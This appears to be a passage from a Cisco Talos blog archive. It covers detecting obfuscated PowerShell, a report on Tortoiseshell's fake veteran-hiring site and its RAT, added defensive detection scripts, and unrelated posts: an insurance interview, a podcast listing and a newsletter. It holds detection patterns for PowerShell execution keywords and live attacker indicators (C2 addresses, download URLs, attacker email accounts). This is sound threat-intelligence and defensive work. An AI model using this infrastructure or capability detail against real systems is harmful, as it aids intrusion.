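ENC_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}

# Publicly documented strings that frequently appear in obfuscated or staged scripts;
# used here purely as a defensive indicator to surface the decoded script for review.
SUSPICIOUS_DECODED = re.compile(r"\b(invoke-expression|iex|frombase64string)\b", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token: str):
    """Return the decoded script, or None if the token is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError subclass
        return None


def analyse_powershell(event: dict):
    """Return a list of findings for a PowerShell launch, [] if clean, None if not PowerShell."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = event["cmdline"]
    findings = []
    if len(cmd) > LONG_CMDLINE_THRESHOLD:
        findings.append(f"long command line ({len(cmd)} chars)")
    tokens = cmd.split()
    for i, tok in enumerate(tokens):
        if tok.lower() in ENC_FLAGS and i + 1 < len(tokens):
            script = decode_encoded_command(tokens[i + 1])
            if script is None:
                findings.append("encoded command that does not decode as base64/UTF-16LE")
                continue
            findings.append(f"encoded command ({len(script)} chars decoded)")
            hits = sorted({m.lower() for m in SUSPICIOUS_DECODED.findall(script)})
            if hits:
                findings.append("decoded script contains " + ", ".join(hits))
    return findings


def scan(events):
    """Map event id -> findings for every PowerShell launch that produced a finding."""
    flagged = {}
    for ev in events:
        findings = analyse_powershell(ev)
        if findings:
            flagged[ev["id"]] = findings
    return flagged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [   # constructed sample records
    {"id": 1, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "image": PS, "cmdline": "powershell.exe -NoProfile -w hidden -enc "
     + encode_command("Invoke-Expression 'Write-Output constructed-sample'")},
    {"id": 3, "image": PS, "cmdline": 'powershell.exe -Command "' + "Write-Output pad;" * 100 + '"'},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS).items():
        print(event_id, findings)
```

The threshold and keyword list are deliberately simple; in practice both are tuned against a baseline of the environment's legitimate PowerShell usage, and it is the decoded script, not the base64 blob, that should reach the analyst.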

                How Tortoiseshell created a fake veteran hiring website to host malware



                By Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

                Introduction

                Cisco Talos recently discovered a threat actor attempting to take advantage of Americans who may be seeking a job, especially military veterans. The actor, previously identified by Symantec as Tortoiseshell, deployed a website called hxxp://hiremilitaryheroes[.]com that posed as a website to help U.S. military veterans find jobs. The URL is strikingly close to the legitimate service from the U.S. Chamber of Commerce, https://www.hiringourheroes.org. The site prompted users to download an app, which was actually a malware downloader, deploying malicious spying tools and other malware.

                These are just the latest actions by Tortoiseshell. Previous research showed that the actor was behind an attack on an IT provider in Saudi Arabia. For this campaign Talos tracked, Tortoiseshell used the same backdoor it has used in the past, showing that the group is relying on some of the same tactics, techniques and procedures (TTPs).

                Fake veteran hiring website


                The fake website, called "Hire Military Heroes" (hxxp://hiremilitaryheroes[.]com/), immediately goes after veterans with an image from the movie "Flags of our Fathers."


                The website is composed of only three links to download a desktop app for free. The app is a fake installer. Contrary to standard malware installers, this one does not need to be silent, as the user expects an installation. Here is a look at the user interface; the error message is always displayed, to suggest that something has "stopped" the app from accessing its database.



                The progress bar almost fills up entirely, and then displays an error message:


                The installer checks if Google is reachable. If not, the installation stops. If it is reachable, the installer downloads two binaries from hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=UID:



                The downloaded binaries are delivered base64-encoded. One of the binaries is a tool used to perform a reconnaissance stage on the system and the second is the Remote Administration Tool (RAT). The RAT is executed as a service. The installer first installs the service (using the -install argument) and then stops and starts the service with the command and control (C2) server IP as an argument:



                If something fails during the installation, an email is sent to the attacker. The credentials are hardcoded in the installer. The email account is ericaclayton2020@gmail[.]com and the error email is sent to marinaparks108@gmail[.]com.
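The installer registers the RAT as a Windows service and passes the C2 IP to it as a service argument. A defender can hunt for that pattern in Windows System log event 7045 ("A service was installed in the system") records. The Python below is an added example written for this page, not Talos tooling or part of the post's analysis; the three 7045 messages are constructed, with documentation-range addresses (203.0.113.0/24) standing in for the post's real IOCs, and the three heuristics (IPv4 literal in the service arguments, binary under a user-writable directory, service running as LocalSystem) are assumptions about what is worth flagging.

```python
import re

# Field labels as they appear in the 7045 message body.
FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.M,
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Assumption: a service binary under one of these directories is unusual enough to flag.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def parse_7045(message: str) -> dict:
    """Pull the labelled fields out of a 7045 event message."""
    return {label: value.strip() for label, value in FIELD_RE.findall(message)}


def split_image_path(image_path: str):
    """Split 'Service File Name' into (executable, arguments); quoted paths may contain spaces."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end != -1:
            return s[1:end], s[end + 1:].strip()
    parts = s.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def analyse_service_install(message: str) -> list:
    """Return the list of heuristic findings for one 7045 record ([] when nothing stands out)."""
    fields = parse_7045(message)
    exe, args = split_image_path(fields.get("Service File Name", ""))
    findings = []
    if IPV4_RE.search(args):
        findings.append("ipv4-literal-in-service-arguments")
    if any(marker in exe.lower() for marker in USER_WRITABLE_MARKERS):
        findings.append("binary-in-user-writable-directory")
    # Privilege only matters once something else looks wrong, so record it last.
    if findings and fields.get("Service Account", "").lower() == "localsystem":
        findings.append("runs-as-localsystem")
    return findings


# Constructed 7045 messages (not real events): a normal svchost service, a binary in %TEMP%
# started with an IP argument, and a vendor agent that legitimately takes a server address.
SAMPLE_7045_RECORDS = [
    r"""A service was installed in the system.

Service Name:  netsvcs-constructed
Service File Name:  C:\Windows\System32\svchost.exe -k netsvcs
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    r"""A service was installed in the system.

Service Name:  ConstructedUpdater
Service File Name:  "C:\Users\victim\AppData\Local\Temp\updater.exe" 203.0.113.10
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    r"""A service was installed in the system.

Service Name:  ConstructedVendorAgent
Service File Name:  "C:\Program Files\ConstructedVendor\agent.exe" --server 203.0.113.20
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  NT AUTHORITY\LocalService""",
]

if __name__ == "__main__":
    for record in SAMPLE_7045_RECORDS:
        print(parse_7045(record)["Service Name"], analyse_service_install(record))
```

As the third record shows, an IP literal in service arguments is not rare on its own (monitoring agents do it), so the value is in the combination of findings and in correlating the service binary with how it arrived on the host.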

                Reconnaissance phase


                The downloaded reconnaissance tool is named "bird.exe" on the system, and its internal name is Liderc. Liderc is a supernatural being of Hungarian folklore. The original form of this creature is a chicken, which would explain the name of the dropped PE on the system, "Bird.exe."

                The purpose is to collect a lot of information on the victim machine:








                The attacker retrieves information such as the date, time and drivers. The attacker can then see information on the system, the patch level, the number of processors, the network configuration, the hardware, firmware versions, the domain controller, the name of the admin, the list of accounts, etc. This is a significant amount of information relating to a machine and makes the attacker well-prepared to carry out additional attacks. The attacker even gets the size of the screen by using WMI, which is potentially a trick to identify whether the system is a sandbox.

                All this information is sent by email by using the same emails:



                Remote access tool


                This actor also deploys a RAT named "IvizTech" on the system. The code and features are similar to the ones outlined by Symantec. The C2 IP is passed to the service as an argument. The attackers hoped that this would make it impossible to reach the C2 without the installer: you cannot get there with the RAT alone. This gives the attackers a malware they can add modules onto, with no need to recompile when they want to update the C2. Requiring the installer also could make it more complicated for researchers to access the C2 and get hands-on analysis of the malware.

                The malware has four features:

                • kill_me: It stops the service and removes the malware
                • Upload: It downloads a file from the internet
                • Unzip: It uses PowerShell to unzip and execute code on the system
                • And finally, the malware can execute a command

                Conclusion


                This new campaign utilizing the malicious hiring website represents a massive shift for Tortoiseshell. This particular attack vector has the potential to allow a large swath of people to become victims of this attack. Americans are quick to give back and support the veteran population. Therefore, this website has a high chance of gaining traction on social media, where users could share the link in the hope of supporting veterans.

                At the time of publication, we do not know the method of distribution used, nor do we have proof of this existing in the wild. The level of sophistication is low, as the .NET binary used has poor OPSEC, such as hard-coded credentials, but it also uses more advanced techniques, such as making the malware modular and aware that the victim already ran it. There is a possibility that multiple teams from an APT worked on multiple elements of this malware, as we can see certain levels of sophistication existing and various levels of victimology.

                Coverage


                Intrusion prevention systems such as SNORT® provide an effective tool to detect Tortoiseshell activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                Additional ways our customers can detect and block these threats are listed below.



                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs


                Network


                hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdte
                hxxp://66[.]42[.]78[.]193/response/
                hxxp://66[.]42[.]78[.]193/statement/
                hxxp://hiremilitaryheroes[.]com/

                Samples


                Installers:

                c121f97a43f4613d0a29f31ef2e307337fa0f6d4f4eee651ee4f41a3df24b6b5
                2a9589538c563c006eaf4f9217a192e8a34a1b371a31c61330ce2b396b67fd10
                55b0708fed0684ce8fd038d4701cc321fe7b81def7f1b523acc46b6f9774cb7b

                Reconnaissance PE:

                ec71068481c29571122b2f6db1f8dc3b08d919a7f710f4829a07fb4195b52fac

                RAT:

                51d186c16cc609ddb67bd4f3ecd09ef3566cb04894f0496f7b01f356ae260424

                Additional IOCs related to this actor


                41db45b0c51b98713bc526452eef26074d034b2c9ec159b44528ad4735d14f4a
                78e1f53730ae265a7eb00b65fbb1304bbe4328ee5b7f7ac51799f19584b8b9d4
                46873290f58c25845b21ce7e560eae1b1d89000e887c2ff2976d931672390dd8
                f31b5e14314388903a32eaa68357b8a5d07cbe6731b0bd97d2ee33ac67ea8817
                f1c05ff306e941322a38fffb21dfdb5f81c42a00a118217b9d4e9807743d7275
                1848f51d946fa8b348db8ef945a1ebff33ff76803ad26dfd175d9ea2aa56c7d0
                ed150d9f6e12b6d669bcede3b7dc2026b7161f875edf26c93296e8c6e99152d5
                2682328bde4c91637e88201eda5f5c400a3b3c0bdb87438d35660494feff55cf
                e82a08f1514ccf38b3ae6b79e67d7605cb20b8377206fbdc44ddadfb06ae4d0d



                185[.]43[.]108[.]134
                162[.]220[.]55[.]249

                Spreadme[.]international
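The network indicators above are defanged (hxxp, [.]) so they cannot be clicked by accident, which also means they have to be normalised before they can be matched against telemetry. The Python below is an added example written for this page rather than Talos tooling: it refangs the post's network IOCs, reduces them to a set of hosts, and checks constructed proxy log lines against that set, matching subdomains of indicator domains as well as exact hosts. The proxy log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Copied from the post's IOC section (defanged exactly as published).
DEFANGED_IOCS = """
hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdte
hxxp://66[.]42[.]78[.]193/response/
hxxp://66[.]42[.]78[.]193/statement/
hxxp://hiremilitaryheroes[.]com/
185[.]43[.]108[.]134
162[.]220[.]55[.]249
Spreadme[.]international
"""

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def refang(indicator: str) -> str:
    """Reverse the common defanging conventions (hxxp/hxxps, [.], [:], (.)) used in reports."""
    s = indicator.strip()
    s = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), s, flags=re.I)
    return s.replace("[.]", ".").replace("[:]", ":").replace("(.)", ".")


def build_host_set(defanged_block: str) -> set:
    """Refang every non-empty line and keep only the host part (URLs are reduced to their host)."""
    hosts = set()
    for line in defanged_block.splitlines():
        if not line.strip():
            continue
        ind = refang(line)
        host = urlsplit(ind).hostname if "://" in ind else ind
        if host:
            hosts.add(host.lower())
    return hosts


def host_matches(host: str, ioc_hosts: set) -> bool:
    """Exact match, or a subdomain of an indicator domain (never suffix-match IP literals)."""
    host = host.lower().rstrip(".")
    if host in ioc_hosts:
        return True
    return any(host.endswith("." + h) for h in ioc_hosts if not IPV4_RE.match(h))


def find_ioc_hits(log_text: str, ioc_hosts: set) -> list:
    """Return (timestamp, client, matched_host) for each request whose host is an indicator."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, _method, url = parts[:4]
        host = urlsplit(url).hostname
        if host and host_matches(host, ioc_hosts):
            hits.append((ts, client, host))
    return hits


# Constructed proxy log: "timestamp client method url status" (assumed format, sample data).
# The hiringourheroes.org line is the legitimate site the fake one imitates and must not match.
SAMPLE_PROXY_LOG = """\
2019-09-23T10:01:02Z 10.1.2.3 GET http://hiremilitaryheroes.com/ 200
2019-09-23T10:01:05Z 10.1.2.3 GET http://199.187.208.75/MyWS.asmx/GetUpdate?val=CONSTRUCTED 200
2019-09-23T10:02:00Z 10.1.2.4 GET https://www.hiringourheroes.org/ 200
2019-09-23T10:03:00Z 10.1.2.5 POST http://66.42.78.193/statement/ 200
2019-09-23T10:04:00Z 10.1.2.6 GET http://www.spreadme.international/x 404
"""

if __name__ == "__main__":
    hosts = build_host_set(DEFANGED_IOCS)
    for hit in find_ioc_hits(SAMPLE_PROXY_LOG, hosts):
        print(hit)
```

Matching on host rather than full URL is deliberate: the GetUpdate URL carries a per-victim token in its query string, so an exact-URL match would miss every infection but the one that was analysed.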

                "You rock" installer snippet:



                An in-depth look at cyber insurance: We sat down with risk expert, Cisco's Leslie Lamb

                Y2K is known for being one of the most widespread times of panic in IT. It was generally thought that on Dec. 31, 1999, computers across the globe would shut down when they would fail to properly process that it would become the year 2000 the next day.

                It made headlines across the globe, sent everyone with a computer into a panic and even led to the creation of several U.S. government task forces to prepare for the problem.

                But what you may not know is that Y2K spawned the birth of cyber security insurance.

                In the buildup of panic, companies became worried that they would lose all their information stored on computers or would lose all ability to operate come Jan. 1, 2000. It was around this time that companies and organizations started to consider mitigating the risk regarding computers and digital storage.

                Leslie Lamb was actually one of the first people to even negotiate for a security insurance policy on Cisco’s behalf. Today, the popularity of cyber insurance has exploded as government agencies, small cities, companies and non-profits worry about the rise in ransomware attacks.

                Recent studies suggest having a cyber insurance policy could actually be more attractive to attackers, but companies like to have the policies to cover them if they lose substantial revenue, data or operating time as the result of a cyber attack. Many security experts consider it to be one of the tools that should be considered to mitigate an organization’s risk.

                So what, exactly, goes into these policies? And how have they changed over time? To get a better idea of how cyber insurance works, and what, exactly, it covers, we sat down with Lamb, Cisco’s director of global risk and resiliency management. Below, we have edited our Q&A for brevity and clarity.

                Why do you think cyber insurance has become such a popular trend recently?

                Well, cyber insurance is not actually new. That is a misconception that a lot of people hold.

                It’s been around for at least 10-15 years. It has just recently taken off.

                Over the past five years, it has grown exponentially because of the high profile nature of some cyber incidents. People are aware of what’s going on … no one is immune to having a cyber incident. It’s becoming one of the largest areas for companies to focus on. I’ve been paying attention to cyber for a long time. People thought there’d be major impacts, but there haven’t been … until about 6 or 7 years ago, when we started to see large companies, government entities and even our infrastructure attacked and at risk. Now, people are really starting to look at it.

                How have these policies changed since Y2K, then?

                They’ve changed dramatically over the past five years.

                That whole space has completely blossomed. I would say 6 - 7 years ago … there were a lot of gaps in the coverage. For example, it was very difficult to find Business Interruption coverage, which would cover costs for loss of revenue. Companies were submitting claims to their insurance carriers and were finding that they were not covered. Insurance companies started to realize there were gaps in coverage, and they started to make these policies much broader and much more meaningful to their customers’ specific risks.

                Most cyber policies have deductibles, both monetary and time-bound deductibles or waiting periods. Most people are familiar with monetary deductibles, but may not be familiar with time-bound deductibles. An example of a time-bound deductible or waiting period would be when a company has a network outage: they may have to wait for 24 or 48 hours before their coverage would kick in. The larger the company or exposure, typically the larger the monetary and/or longer the time-bound deductibles might be.

                Are there any aspects of these policies that you feel people wouldn’t normally think about?

                A few examples of coverage that are currently found in the marketplace and that some people may not know about are coverage for physical damage to hardware or business interruption to help pay for the loss of revenue while the impacted operation is down.

                What are some things that stand out to you when you consider what goes into buying Cisco’s cyber insurance policies?

                I purchased the first cyber insurance policy that Cisco had, and I purchased it ahead of the curve or before many companies were even considering the purchase.

                Generally, we start 120 days out [from when the policy expires]. We essentially do a roadshow for the insurers and present to them what we do as a company. We bring in [Cisco’s CISO] and other internal experts to showcase our mitigation strategies, how we would manage any issue and we discuss our overall governance and internal policies. 

                We also talk about all of the different partnerships across the enterprise that help mitigate the risk.  This is about education and awareness. This isn’t about just IT, it’s about forming internal partnerships to manage the risk. There’s legal, there’s HR, there’s risk management and others all at the table.

                What are some of the things companies can do to help mitigate risk ahead of time to temper the cost of their policies? 

                Making sure their network is safe, providing education and awareness to employees ... having a good business resiliency program in place, doing tabletop exercises to ensure everyone knows their role and everyone knows what to do or not do if they have cyber insurance. Many policies have certain requirements in place, so if you want coverage, you should definitely read the policy ahead of time and know what’s included, what’s not included and what the insurer requires. Many insurers have a panel of experts included in the policy that insured entity can access. People should know about these experts ahead of time and how they might use them.

                We don’t live in a world anymore where it’s just four walls and a router. Everything is interconnected.

                How can insurance policies address that?

                That’s a really complex question, but it depends. … Let’s just say for example [a contract manufacturer], because of the way they put together our gear, causes a cyber problem for one of our customers. We would have a contract that requires the contracted manufacturer to have “network security liability” to cover the costs.

                Our philosophy is … that if Cisco caused it, we’re going to pay for it. Whether we pay for it financially or our insurance policies, it’s our responsibility to pay for it. But if a third party causes it, we need them to pay for it, which is why we get involved in requiring our third party vendors to have certain types of insurance.

                Beers with Talos Ep. #62: Fifty shades of shady



                Beers with Talos (BWT) Podcast episode No. 62 is now available. Download this episode and subscribe to Beers with Talos:

                If iTunes and Google Play aren't your thing, click here.

                Recorded Sept. 13, 2019 

                In one of our "rantier" episodes, the BWT crew dives into the ongoing insidiousness that is cryptomining with Watchbog, and then we turn our attention to some idiot that thinks charging people $50 to bypass MFA on their own machines is a good idea, because nothing bad can happen there, right? RIGHT?! Finally, we take a look at some recent breaches and the trend of attempting to downplay the severity of a breach because the data ex-fil wasn’t “vital or important.” Again, what can go wrong with that line of thinking? This is fine. Everything is just fine. Security is solved, we can go home now.

                The timeline:

                • 01:15 – Roundtable: BWT is infamous, a flying blunderbuss, Mighty Reds, new phones, opening night
                • 15:00 — Pink fluffy ponies dancing on Monero
                • 29:00 — Duo is your friend...bypassing MFA is not
                • 36:00 — Dangers of denying breach severity
                • 49:15 — Parting shots and closing thoughts

                Some other links:

                ==========

                Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                Hosted by Mitch Neff (@MitchNeff)

                Subscribe via iTunes (and leave a review!)


                Subscribe to the Threat Source newsletter


                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                Threat Source newsletter (Sept. 26)


                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                An attacker known as “Tortoiseshell” is using a phony, malicious website to deliver malware. The site specifically targets U.S. military veterans who may be searching for a job. These types of sites are likely to be shared on social media as the general population hopes to support the veteran population.

                Forget about the iPhone 11, impeachment or nation-state cyber attacks. We all know the biggest news of the past week was Area 51. And thankfully, the latest Beers with Talos talks about storming the secret military base. And some other, more cyber security-focused things.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
                Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered that targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect the targets’ DNS and discovered some SSL certificates registered for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Apple released iOS 13 to all mobile users over the past week. There’s a series of new privacy and security features with the latest version of the operating system, though some of them are not working as expected. 
                • Dozens of YouTubers had their account credentials stolen and accounts taken over as part of a wave of attacks over the weekend. Attackers used malicious websites to trick the content creators into entering their login information. 
                • Microsoft released an out-of-band patch for Internet Explorer this week for a critical vulnerability. An attacker could exploit this bug to completely take over a user’s machine.  
                • The U.S. is reportedly looking into several options to carry out a cyber attack against Iran. The goal is to disrupt their military operations without escalating kinetic warfare. 
                • U.S. security firm CrowdStrike got wrapped up in the impeachment investigation into President Donald Trump. The company assisted the U.S. Democratic National Committee in researching cyber attacks during the 2016 presidential election, and Trump asked the Ukrainian national government to research CrowdStrike, thinking the company was located there. 
                • Security firm Symantec discovered 25 apps on the Google Play store spreading malware. Together, they had been downloaded about 2.1 million times. 
                • Amazon unveiled its idea for a new wireless protocol called “Sidewalk” that is designed to connect users’ Amazon-created IoT home devices. The company says Wi-Fi and Bluetooth do not extend far enough, and 5G is currently too expensive. 
                • The actors behind the Magecart malware are testing new code that could target public WiFi hotspots. Security researchers say Magecart Group 5 is preparing the code to be injected into benign JavaScript files. 
                • A new report from the U.S. Government Accountability Office says that the U.S. Department of Energy has not done enough to protect the American electrical grid from cyber attacks. The report states actors across the globe can force power outages via cyber attacks, though the breadth of those outages is currently unknown.  

                Notable recent security issues

                Title: New Emotet campaign emerges, but protection stays the same 
                Description: At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer draws to a close, Cisco Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. The malware still mainly relies on socially engineered spam emails to spread. Once the attackers have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.
                Snort SIDs: 47616, 47617, 48402, 49889, 43890 – 43892, 44559, 44560

                Title: Aspose PDF API contains multiple remote code execution vulnerabilities
                Description: There are multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API. 
                Snort SIDs: 50730, 50731, 50738, 50739

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
                MD5: 47b97de62ae8b2b927542aa5d7f3c858
                Typical Filename: qmreportupload.exe
                Claimed Product: qmreportupload
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b 
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201

                SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
                MD5: e2ea315d9a83e7577053f52c974f6a5a
                Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
                Claimed Product: N/A
                Detection Name: W32.AgentWDCR:Gen.21gn.1201

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe 
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG 